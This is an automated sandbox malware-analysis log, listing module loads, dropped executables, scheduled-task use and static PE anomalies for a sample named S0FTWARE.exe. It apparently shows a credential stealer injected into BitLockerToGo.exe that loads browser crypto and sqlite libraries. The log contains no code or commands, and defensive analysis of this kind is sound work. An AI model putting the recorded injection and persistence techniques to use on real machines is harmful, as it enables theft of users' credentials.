                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: lfsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationframework.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: brokerlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationframeworkps.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanagerclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationwinpalmisc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledevicetypes.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mdmcommon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\ProgramData\AAFIJKKEHJ.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\ProgramData\GoogleUP\Chrome\Updater.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: apphelp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: windows.storage.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: wldp.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: kernel.appcore.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: propsys.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: profapi.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: edputil.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: urlmon.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: iertutil.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: srvcli.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: netutils.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: sspicli.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: wintypes.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: appresolver.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: bcp47langs.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: slc.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: userenv.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: sppc.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\ProgramData\GHDAKKJJJK.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\service.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: S0FTWARE.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: S0FTWARE.exeStatic file information: File size 26859520 > 1048576
                        Source: S0FTWARE.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xbf8400
                        Source: S0FTWARE.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb02a00
                        Source: S0FTWARE.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1fd400
                        Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3374753902.0000000035DB4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.3370381452.0000000029ED5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
                        Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmp
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A1A132
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp$
                        Source: softokn3.dll.3.drStatic PE information: real checksum: 0x46753 should be: 0x38bc1
